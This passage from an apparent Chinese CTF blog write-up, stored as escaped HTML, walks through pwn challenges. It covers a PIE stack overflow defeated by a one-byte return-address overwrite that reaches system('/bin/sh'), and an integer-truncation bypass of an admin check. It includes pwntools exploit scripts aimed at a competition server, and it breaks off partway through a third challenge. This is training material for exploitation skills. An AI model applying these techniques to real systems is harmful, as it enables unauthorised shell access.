executable\uff0c\u4e2d\u6587\u89e3\u91ca\u4e3a\u5730\u5740\u65e0\u5173\u53ef\u6267\u884c\u6587\u4ef6\uff0c\u8be5\u6280\u672f\u662f\u4e00\u4e2a\u9488\u5bf9\u4ee3\u7801\u6bb5\uff08.text\uff09\u3001\u6570\u636e\u6bb5\uff08.data\uff09\u3001\u672a\u521d\u59cb\u5316\u5168\u5c40\u53d8\u91cf\u6bb5\uff08.bss\uff09\u7b49\u56fa\u5b9a\u5730\u5740\u7684\u4e00\u4e2a\u9632\u62a4\u6280\u672f\uff0c\u5982\u679c\u7a0b\u5e8f\u5f00\u542f\u4e86PIE\u4fdd\u62a4\u7684\u8bdd\uff0c\u5728\u6bcf\u6b21\u52a0\u8f7d\u7a0b\u5e8f\u65f6\u90fd\u53d8\u6362\u52a0\u8f7d\u5730\u5740\uff0c\u4ece\u800c\u4e0d\u80fd\u901a\u8fc7ROPgadget\u7b49\u4e00\u4e9b\u5de5\u5177\u6765\u5e2e\u52a9\u89e3\u9898\u3002<\/p>\n\n\n\n<p>\u6211\u4eec\u77e5\u9053\uff0c\u5185\u5b58\u662f\u4ee5\u9875\u8f7d\u5165\u673a\u5236\uff0c\u5982\u679c\u5f00\u542fPIE\u4fdd\u62a4\u7684\u8bdd\uff0c\u53ea\u80fd\u5f71\u54cd\u5230\u5355\u4e2a\u5185\u5b58\u9875\uff0c\u4e00\u4e2a\u5185\u5b58\u9875\u5927\u5c0f\u4e3a0x1000\uff0c\u90a3\u4e48\u5c31\u610f\u5473\u7740\u4e0d\u7ba1\u5730\u5740\u600e\u4e48\u53d8\uff0c\u67d0\u4e00\u6761\u6307\u4ee4\u7684\u540e\u4e09\u4f4d\u5341\u516d\u8fdb\u5236\u6570\u7684\u5730\u5740\u662f\u59cb\u7ec8\u4e0d\u53d8\u7684\u3002\u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u8986\u76d6\u5730\u5740\u7684\u540e\u51e0\u4f4d\u6765\u53ef\u4ee5\u63a7\u5236\u7a0b\u5e8f\u7684\u6d41\u7a0b<\/p>\n\n\n\n<p>\u597d\uff0c\u77e5\u9053\u8fd9\u4e48\u591a\uff0c\u6211\u4eec\u8ddf\u8fdbfunc1\u770b\u770b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-21.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"763\" height=\"300\" 
data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-21.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-675\"  sizes=\"auto, (max-width: 763px) 100vw, 763px\" \/><\/div><\/figure>\n\n\n\n<p>\u5f88\u6807\u51c6\u7684\u6808\u6ea2\u51fa\u6f0f\u6d1e\u70b9<\/p>\n\n\n\n<p>\u53e6\u5916\uff0c\u6211\u4eec\u4e5f\u5f88\u5bb9\u6613\u5728\u51fd\u6570\u680f\u90a3\u91cc\u770b\u5230\u5b58\u5728backdoor\u51fd\u6570<\/p>\n\n\n\n<p>\u8ddf\u8fdbbackdoor\u53ef\u4ee5\u770b\u5230<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-20.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"416\" height=\"199\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-20.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-674\"  sizes=\"auto, (max-width: 416px) 100vw, 416px\" 
\/><\/div><\/figure>\n\n\n\n<p>\u90a3\u601d\u8def\u8fd8\u662f\u5f88\u660e\u786e\u4e86\uff0c\u5c31\u662f\u6808\u6ea2\u51fa\u8986\u76d6\u8fd4\u56de\u5730\u5740\u5230backdoor\u51fd\u6570<\/p>\n\n\n\n<p>\u4f46\u662fpie\u673a\u5236\u4e0d\u662f\u8bf4\u597d\u662f\u968f\u673a\u5316\u5730\u5740\u7684\u5417\uff0c\u90a3\u6211\u4eec\u600e\u4e48\u786e\u5b9abackdoor\u5728\u8fd0\u884c\u65f6\u7684\u5730\u5740\uff1f<\/p>\n\n\n\n<p>\u5b9e\u9645\u4e0a\uff0c\u5982\u679c\u4f60\u5207\u6362\u5230text view\u89c6\u56fe<\/p>\n\n\n\n<p>\u53bb\u89c2\u5bdfmain\u51fd\u6570\u548cbackdoor\u51fd\u6570\uff0c\u5c31\u4f1a\u53d1\u73b0\u4e24\u4e2a\u51fd\u6570\u662f\u5728\u540c\u4e00\u5185\u5b58\u9875\u4e0a\u7684<\/p>\n\n\n\n<p>\u90a3\u4e48\uff0c\u5982\u679c\u7a0b\u5e8f\u8fdb\u5165main\u51fd\u6570\u4e86\uff0c\u5bf9\u5e94\u7684\u6808\u6307\u9488\u5c31\u5728main\u4e0a\uff0c\u90a3\u4e48\u4f60\u53ea\u8981\u8986\u76d6\u8fd4\u56de\u5730\u5740\u7684\u540e\u4e24\u4f4d\uff08\u56e0\u4e3a\u8fd9\u91cc\u90fd\u662f0x12xx\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-19-1024x659.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"659\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-19-1024x659.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-673\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" 
\/><\/div><\/figure>\n\n\n\n<p>\u6240\u4ee5\u601d\u8def\u8fd8\u662f\u86ee\u660e\u786e\u7684\uff0c0x28\u5148\u586b\u5145\u6ee1buf\uff08\u4f60\u90fd\u770bpie\u8fd9\u9898\u4e86\uff0c\u5e94\u8be5\u77e5\u9053\u4e3a\u4ec0\u4e48\u662f0x28\u5427\u2026\u2026\u4e0d\u7406\u89e3\u8fd8\u662f\u60f3\u7406\u89e3\u7684\uff0c\u8054\u7cfb\u51fa\u9898\u4eba\uff09<\/p>\n\n\n\n<p>\u7136\u540ep8\u8986\u76d6\u5730\u5740\u7684\u540e\u4e24\u4f4d\uff0c\u8fd9\u6837\u7531\u4e8e\u5f53\u524d\u7684\u6808\u6307\u9488\u524d\u9762\u7684\u51e0\u4f4d\u5168\u662f\u548cbackdoor\u4e00\u81f4\u7684\uff0c\u53ea\u6539\u540e\u4e24\u4f4d\u5c31\u80fd\u505a\u5230\u8df3\u8f6cbackdoor\u51fd\u6570<\/p>\n\n\n\n<p>\u597d\u4e86\uff0c\u8fd9\u91cc\u53c8\u8981\u5f15\u51fa\u53e6\u5916\u4e00\u4e2a\u95ee\u9898\uff1a<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u4e3a\u4ec0\u4e48\u4e0d\u76f4\u63a5\u8df3\u8f6c\u5230<code>0x124C<\/code>\uff1f<\/h4>\n\n\n\n<p>\u5f53\u6211\u4eec\u901a\u8fc7\u6f0f\u6d1e\u8986\u76d6\u8fd4\u56de\u5730\u5740\u65f6\uff0c\u7a0b\u5e8f\u7684<strong>\u6808\u72b6\u6001\u662f\u56fa\u5b9a\u7684<\/strong>\uff08\u7531\u6f0f\u6d1e\u89e6\u53d1\u65f6\u7684\u4e0a\u4e0b\u6587\u51b3\u5b9a\uff09\u3002\u5982\u679c\u76f4\u63a5\u8df3\u8f6c\u5230<code>0x124C<\/code>\uff08\u51fd\u6570\u8d77\u59cb\u5730\u5740\uff09\uff0c\u4f1a\u6267\u884c<code>push rbp<\/code>\u6307\u4ee4 \u2014\u2014 \u8fd9\u6761\u6307\u4ee4\u4f1a\u5c06\u5f53\u524d<code>rbp<\/code>\u7684\u503c\u538b\u5165\u6808\u4e2d\uff0c<strong>\u4fee\u6539\u6808\u7684\u5e03\u5c40<\/strong>\u3002<\/p>\n\n\n\n<p>\u5982\u679c\u6b64\u65f6\u6808\u7684\u72b6\u6001\u4e0e<code>backdoor<\/code>\u51fd\u6570\u9884\u671f\u7684\u6808\u5e27\u4e0d\u5339\u914d\uff08\u6bd4\u5982\u6808\u9876\u4f4d\u7f6e\u4e0d\u5bf9\uff09\uff0c<code>push rbp<\/code>\u53ef\u80fd\u4f1a\u8986\u76d6\u5173\u952e\u6570\u636e\uff0c\u6216\u5bfc\u81f4\u540e\u7eed<code>mov rbp, rsp<\/code>\u8bbe\u7f6e\u7684\u6808\u57fa\u5740\u9519\u8bef\uff0c\u6700\u7ec8\u5bfc\u81f4<code>call 
_system<\/code>\u65f6\u53c2\u6570\u4f20\u9012\u5931\u8d25\uff08\u65e0\u6cd5\u6b63\u786e\u627e\u5230<code>\"\/bin\/sh\"<\/code>\u7684\u5730\u5740\uff09\uff0c\u751a\u81f3\u7a0b\u5e8f\u5d29\u6e83\u3002<\/p>\n\n\n\n<p>\u6240\u4ee5\u8fd9\u4e2a\u65f6\u5019\uff0c\u6211\u4eec\u73a9\u70b9\u8d56\u76ae\u7684\uff0c\u6211\u4eec\u76f4\u63a5\u8df3\u5230<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.text:0000000000001250                 lea     rax, command    ; \"\/bin\/sh\"<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u76f4\u63a5\u8c03\u7528system(&#8220;\/bin\/sh&#8221;)\u4e86<\/p>\n\n\n\n<p>\ud83c\udd97\uff0c\u8981\u7d20\u96c6\u9f50\u4e86\uff0cexp\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>#context.log_level='debug'<br><br>#p = process('.\/attachment')<br>p = remote(\"ctf.ctbu.edu.cn\",33814)<br>payload = b'a'*0x28 + p8(0x50)<br>p.send(payload)<br>p.interactive()<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">coctf{Your_love_has_never_changed_like_pie_[GUID]}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Trunc<\/strong><\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u6574\u4f53\u529f\u80fd<\/h4>\n\n\n\n<p>\u7ed3\u5408\u6808\u5e03\u5c40\uff0c<code>main<\/code> \u51fd\u6570\u6267\u884c\u6d41\u7a0b\uff08\u53cd\u7f16\u8bd1\u9010\u53e5\u5bf9\u5e94\uff09\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-18.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"759\" height=\"490\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-18.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-672\"  sizes=\"auto, (max-width: 759px) 100vw, 759px\" \/><\/div><\/figure>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u521d\u59cb\u5316\u4e0e\u6b22\u8fce\u754c\u9762<\/strong>\uff1a\u8c03\u7528 <code>print_welcome(argc, argv, envp)<\/code>\uff08\u5b9e\u9645\u65e0\u53c2\u6570\u4f9d\u8d56\uff0c\u4ec5\u6253\u5370\u6b22\u8fce\u4fe1\u606f\uff09\uff1b<\/li>\n\n\n\n<li>\u8bfb\u53d6\u59d3\u540d\uff1a\n<ul class=\"wp-block-list\">\n<li>\u8c03\u7528 <code>printf(&amp;format)<\/code> \u6253\u5370 &#8220;\u8bf7\u8f93\u5165\u4f60\u7684\u540d\u5b57:&#8221;\uff1b<\/li>\n\n\n\n<li>\u8c03\u7528 <code>fgets(s, 32, _bss_start)<\/code> \u8bfb\u53d6\u59d3\u540d\uff08<code>_bss_start<\/code> \u5bf9\u5e94\u6807\u51c6\u8f93\u5165 <code>stdin<\/code>\uff0c<code>fgets<\/code> \u9650\u5236\u6700\u591a\u8bfb 32 \u5b57\u8282\uff0c\u65e0\u6808\u6ea2\u51fa\u98ce\u9669\uff09\uff1b<\/li>\n\n\n\n<li>\u8c03\u7528 <code>strcspn(s, \"\\n\")<\/code> \u627e\u5230\u6362\u884c\u7b26\u5e76\u7f6e 0\uff0c\u79fb\u9664\u8f93\u5165\u4e2d\u7684\u6362\u884c\uff1b<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>\u8bfb\u53d6\u9b54\u6cd5\u7f16\u53f7\uff1a\n<ul class=\"wp-block-list\">\n<li>\u8c03\u7528 <code>printf(&amp;byte_4020E6)<\/code> \u6253\u5370 &#8220;\u8bf7\u8f93\u5165\u4f60\u7684\u9b54\u6cd5\u7f16\u53f7:&#8221;\uff1b<\/li>\n\n\n\n<li>\u8c03\u7528 <code>__isoc99_scanf(\"%llu\", &amp;v4)<\/code> \u8bfb\u53d6 64 \u4f4d\u65e0\u7b26\u53f7\u6574\u6570\u5230 <code>v4<\/code>\uff1b<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u9b54\u6cd5\u7f16\u53f7\u622a\u65ad<\/strong>\uff1a\u6267\u884c <code>v6 = v4<\/code>\uff08<code>__int64<\/code> \u8f6c <code>int<\/code>\uff0c64 \u4f4d\u6570\u503c\u622a\u65ad\u4e3a 32 \u4f4d\uff0c\u9ad8 32 
\u4f4d\u88ab\u4e22\u5f03\uff09\uff1b<\/li>\n\n\n\n<li>\u4fe1\u606f\u6253\u5370\u4e0e\u6743\u9650\u6821\u9a8c\uff1a\n<ul class=\"wp-block-list\">\n<li>\u8c03\u7528 <code>printf(asc_402110, s, (unsigned int)v4)<\/code>\uff1a\u683c\u5f0f\u5316\u8f93\u51fa\u59d3\u540d\u4e0e\u9b54\u6cd5\u7f16\u53f7\uff0c\u5176\u4e2d <code>(unsigned int)v4<\/code> \u663e\u5f0f\u5c06 64 \u4f4d <code>v4<\/code> \u8f6c\u4e3a 32 \u4f4d\u65e0\u7b26\u53f7\u6574\u6570\uff0c\u8fdb\u4e00\u6b65\u9a8c\u8bc1\u622a\u65ad\u903b\u8f91\uff1b<\/li>\n\n\n\n<li>\u8c03\u7528 <code>is_admin(v4)<\/code> \u5e76\u5224\u65ad\u8fd4\u56de\u503c\uff1a\u82e5\u4e3a\u771f\u5219\u8c03\u7528 <code>get_flag()<\/code>\uff0c\u5426\u5219\u6253\u5370 <code>byte_402140<\/code>\uff08\u6743\u9650\u4e0d\u8db3\uff09\uff1b<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u7a0b\u5e8f\u9000\u51fa<\/strong>\uff1a\u8fd4\u56de 0\u3002<\/li>\n<\/ol>\n\n\n\n<h4 class=\"wp-block-heading\"><code>is_admin<\/code> \u51fd\u6570\u53cd\u7f16\u8bd1\u5206\u6790\uff08\u6743\u9650\u6821\u9a8c\u6838\u5fc3\uff09<\/h4>\n\n\n\n<p>\u53cd\u7f16\u8bd1\u4ee3\u7801\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">_BOOL8 __fastcall is_admin(int a1)<br>{<br>  return a1 == 322420958;  \/\/ \u5173\u952e\uff1a32\u4f4d\u6574\u6570\u5bf9\u6bd4\uff0c322420958 = 0x1337c0de\uff08\u5341\u516d\u8fdb\u5236\uff09<br>}<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u53c2\u6570\u7c7b\u578b<\/strong>\uff1a<code>a1<\/code> \u4e3a <code>int<\/code>\uff0832 \u4f4d\uff09\uff0c\u4f46\u8c03\u7528\u65f6\u4f20\u5165\u7684\u662f <code>v4<\/code>\uff08<code>__int64<\/code>\uff0c64 \u4f4d\uff09\u2014\u2014 \u6b64\u5904\u5b58\u5728<strong>\u9690\u5f0f\u622a\u65ad<\/strong>\uff1a64 \u4f4d <code>v4<\/code> \u4f20\u5165 32 \u4f4d\u53c2\u6570 <code>a1<\/code> \u65f6\uff0c\u7f16\u8bd1\u5668\u81ea\u52a8\u4e22\u5f03\u9ad8 32 \u4f4d\uff0c\u4ec5\u4fdd\u7559\u4f4e 32 \u4f4d\uff1b<\/li>\n\n\n\n<li><strong>\u6821\u9a8c\u903b\u8f91<\/strong>\uff1a\u4ec5\u5f53\u622a\u65ad\u540e\u7684 32 
\u4f4d\u6570\u503c\u7b49\u4e8e <code>322420958<\/code>\uff08\u5341\u8fdb\u5236\uff09\u65f6\uff0c\u8fd4\u56de\u771f\uff08<code>_BOOL8<\/code> \u5373 64 \u4f4d\u5e03\u5c14\u503c\uff0c\u771f\u4e3a\u975e 0\uff0c\u5047\u4e3a 0\uff09\uff1b<\/li>\n\n\n\n<li><strong>\u5173\u952e\u7ed3\u8bba<\/strong>\uff1a\u7ba1\u7406\u5458\u9b54\u6cd5\u7f16\u53f7\u7684 32 \u4f4d\u503c\u4e3a <code>322420958<\/code>\uff08\u5341\u516d\u8fdb\u5236 <code>0x1337c0de<\/code>\uff09\uff0c\u8fd9\u662f\u6743\u9650\u7ed5\u8fc7\u7684\u6838\u5fc3\u76ee\u6807\u503c\u3002<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">\u6f0f\u6d1e\u7c7b\u578b\uff1a64 \u4f4d\u219232 \u4f4d\u6574\u6570\u622a\u65ad\u6f0f\u6d1e<\/h4>\n\n\n\n<p>\u4ece\u53cd\u7f16\u8bd1\u4ee3\u7801\u4e2d\u53ef\u5b9a\u4f4d<strong>\u4e24\u5904\u5b8c\u5168\u72ec\u7acb\u7684\u622a\u65ad\u903b\u8f91<\/strong>\uff0c\u5747\u5bfc\u81f4 \u201c\u8f93\u5165\u7684 64 \u4f4d\u9b54\u6cd5\u7f16\u53f7\u88ab\u5f3a\u5236\u8f6c\u4e3a 32 \u4f4d\u201d\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u663e\u5f0f\u622a\u65ad<\/strong>\uff1a<code>main<\/code> \u51fd\u6570\u4e2d <code>v6 = v4<\/code>\uff08<code>__int64<\/code> \u8f6c <code>int<\/code>\uff09\uff0c\u9ad8 32 \u4f4d\u76f4\u63a5\u4e22\u5f03\uff1b<\/li>\n\n\n\n<li><strong>\u9690\u5f0f\u622a\u65ad<\/strong>\uff1a<code>is_admin(v4)<\/code> \u8c03\u7528\u65f6\uff0c64 \u4f4d <code>v4<\/code> \u4f20\u5165 32 \u4f4d\u53c2\u6570 <code>a1<\/code>\uff0c\u7f16\u8bd1\u5668\u81ea\u52a8\u622a\u65ad\u9ad8 32 \u4f4d\u3002<\/li>\n<\/ol>\n\n\n\n<p>\u4e24\u5904\u622a\u65ad\u7684\u5171\u540c\u7ed3\u679c\uff1a\u7a0b\u5e8f\u5b9e\u9645\u6821\u9a8c\u7684\u662f \u201c\u8f93\u5165 64 \u4f4d\u6570\u503c\u7684\u4f4e 32 \u4f4d\u201d\uff0c\u800c\u975e\u5b8c\u6574\u7684 64 \u4f4d\u6570\u503c \u2014\u2014 \u8fd9\u662f\u6f0f\u6d1e\u5229\u7528\u7684\u6838\u5fc3\u524d\u63d0\u3002<\/p>\n\n\n\n<h4 
class=\"wp-block-heading\">\u6f0f\u6d1e\u5229\u7528\u6761\u4ef6\uff08\u53cd\u7f16\u8bd1\u89c6\u89d2\uff09<\/h4>\n\n\n\n<p>\u53ea\u8981\u6ee1\u8db3\u4ee5\u4e0b\u6761\u4ef6\uff0c\u5373\u53ef\u7ed5\u8fc7 <code>is_admin<\/code> \u6821\u9a8c\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u8f93\u5165\u7684 64 \u4f4d\u9b54\u6cd5\u7f16\u53f7\uff08\u5b58\u50a8\u5728 <code>v4<\/code> \u4e2d\uff09\u7684<strong>\u4f4e 32 \u4f4d\u503c = 322420958<\/strong>\uff08\u5341\u8fdb\u5236\uff09\uff1b<\/li>\n\n\n\n<li>\u9ad8 32 \u4f4d\u503c\u53ef\u4efb\u610f\uff08\u56e0\u4e3a\u622a\u65ad\u65f6\u4f1a\u88ab\u4e22\u5f03\uff0c\u4e0d\u5f71\u54cd\u6821\u9a8c\u7ed3\u679c\uff09\u3002<\/li>\n<\/ul>\n\n\n\n<p>\u4f8b\u5982\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>64 \u4f4d\u6570\u503c <code>322420958<\/code>\uff08\u5341\u516d\u8fdb\u5236 <code>0x000000001337c0de<\/code>\uff09\uff1a\u4f4e 32 \u4f4d\u4e3a\u76ee\u6807\u503c\uff0c\u9ad8 32 \u4f4d\u4e3a 0\uff1b<\/li>\n\n\n\n<li>64 \u4f4d\u6570\u503c <code>0xdeadbeef1337c0de<\/code>\uff08\u5341\u8fdb\u5236 <code>13134307283877666014<\/code>\uff09\uff1a\u4f4e 32 \u4f4d\u4e3a <code>0x1337c0de<\/code>\uff08\u5373 322420958\uff09\uff0c\u9ad8 32 \u4f4d\u4e3a <code>0xdeadbeef<\/code>\uff0c\u5747\u6ee1\u8db3\u6761\u4ef6\u3002<\/li>\n<\/ul>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br><br># \u76ee\u6807\u4e8c\u8fdb\u5236\u6587\u4ef6<br>binary = '.\/magic_verify'<br><br># \u521b\u5efa\u8fdb\u7a0b\uff0c\u8bbe\u7f6e\u7f16\u7801\u4e3aASCII\u907f\u514d\u5b57\u8282\u8b66\u544a<br># p = process(binary)<br># \u8fdc\u7a0b\u8fde\u63a5\u65f6\u4f7f\u7528\u4e0b\u9762\u8fd9\u884c<br>p = remote('ctf.ctbu.edu.cn',33983)<br><br># \u7ba1\u7406\u5458\u9b54\u6cd5\u7f16\u53f7\u768432\u4f4d\u503c<br># ADMIN_MAGIC = 0x1337c0de<br># \u6784\u902064\u4f4d\u6570\u503c\uff0c\u4f4e32\u4f4d\u4e3aADMIN_MAGIC<br># payload = ADMIN_MAGIC | (0xdeadbeef &lt;&lt; 32)<br><br><br>#\u7b80\u7248payload<br>payload = 
322420958<br><br>p.sendline(b'Hacker')<br><br><br>p.sendline(str(payload).encode())<br>    <br>    <br>p.interactive()<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u65f6\u95f4\u8df3\u8dc3\u673a\u5668<\/h3>\n\n\n\n<p>\u8fd9\u9898\u7684main\u51fd\u6570\u4ee3\u7801\u597d\u957f\uff0c\u6211\u4eec\u76f4\u63a5\u770b\u5173\u952e\u8282\u70b9\u5427<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-17.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"945\" height=\"310\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-17.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-671\"  sizes=\"auto, (max-width: 945px) 100vw, 945px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\uff0c\u5224\u65adsecret_flag == 0x7FFFFFFF\u5c31\u80fd\u62ff\u5230shell<\/p>\n\n\n\n<p>\u597d\uff0c\u90a3\u6211\u4eec\u76f4\u63a5\u627esecret_flag\u662f\u600e\u4e48\u4e2a\u4e8b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-16-1024x151.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"151\" 
data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-16-1024x151.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-670\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u4e00\u770b\uff0c\u4f4d\u4e8ebss\u6bb5\uff0c\u518d\u5f80\u4e0a\u7ffb\u7ffb\u5462\uff1f<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-15-1024x276.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"276\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-15-1024x276.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-669\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" 